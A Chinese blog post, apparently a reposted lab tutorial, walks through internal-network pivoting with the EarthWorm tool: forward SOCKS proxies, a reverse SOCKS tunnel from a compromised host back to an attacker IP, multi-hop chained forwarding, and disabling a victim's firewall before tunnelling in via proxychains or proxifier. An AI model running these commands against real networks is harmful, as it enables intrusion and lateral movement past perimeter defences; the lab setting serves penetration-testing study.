内网转发——反弹代理

内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket

实验一:利用Earthworm实现内网代理转发

实验1:正向代理

实验环境 :win2008  网卡一:10.1.1.1 

                                  网卡二:192.168.140.131

                   win2003:10.1.1.2

实验步骤:

1.将ew工具的ew_for_Win.exe程序上传到win2008服务器
2.进入ew工具的所在位置,设置代理:ew.exe -s ssocksd -l 800

  

3.访问受害者win2003的网页,即可访问到

  

4.外网想要访问受害者网页,也可通过bp添加代理,

5.之后选择刚添加的代理,直接访问内网的ip即可访问到网页的内容

6.如果想要访问远程桌面,则可利用工具proxifier添加代理服务器,即可连接   

    

7.如果在linux上设置代理,则可在浏览器设置代理,如下图,设置完成后即可访问目标主机的网页

    

8.kali中也可用proxychains工具,修改其配置文件,gedit /etc/proxychains.conf,在里边添加代理

    

9.之后输入:proxychains rdesktop 10.1.1.2就可通过代理进行远程连接

  

实验二:ew高级用法反向代理

实验环境 :主机A:物理机
                   主机B:win2008

实验步骤:

1.先在一台具有公网ip的主机A上运行以下命令:

ew.exe -s rcsocks -l 1080 -e 8888

  

2.在目标主机B上启动SOCKS v5 服务 并反弹到公网主机的8888端口

ew.exe -s rssocks -d 攻击者ip -e 8888

  

  

3.在主机A上添加代理服务器,127.0.0.1:1080,即可进行远程连接

  

  

实验三:ew工具进阶—正向反弹代理

实验环境:攻击机 A:物理机
                      win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                      win3C: 网卡一:10.1.1.2
                                  网卡二:172.16.1.1
                      linuxD:172.16.1.2

实验步骤:

1.关闭受害者D的防火墙:service iptables stop

  

2.在内网边界机C上设置端口代理:ew.exe -s ssocksd -l 8000

  

3.在win8上做端口转发:

ew -s lcx_tran -l 1080 -f win3受害者ip -g 8000

  

4.利用proxifier添加代理服务器,ip为win8B的ip,1080端口

  

5.之后便可进行远程访问

实验四:ew工具进阶—反向反弹代理

实验环境:攻击机A:物理机
                     win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                     win3C: 网卡一:10.1.1.2
                                 网卡二:172.16.1.1
                     linuxD:172.16.1.2

实验步骤:

1.攻击机A开启监听端口:ew.exe  -s lcx_listen -l 1080 -e 8888

2.内网边界机win3C将9999端口进行转发:ew.exe -s ssocksd -l 9999

3.内网边界机win8B将内网边界机win3C与攻击机连接起来:

ew -s lcx_slave -d 攻击机ip -e 8888 -f 内网边界机win3C的ip -g 9999

4.攻击机借助proxifier工具配置攻击机机器的代理:127.0.0.1:1080

5.之后便可进行远程访问

发布了63 篇原创文章 · 获赞 75 · 访问量 3851

猜你喜欢

转载自blog.csdn.net/cxrpty/article/details/104947263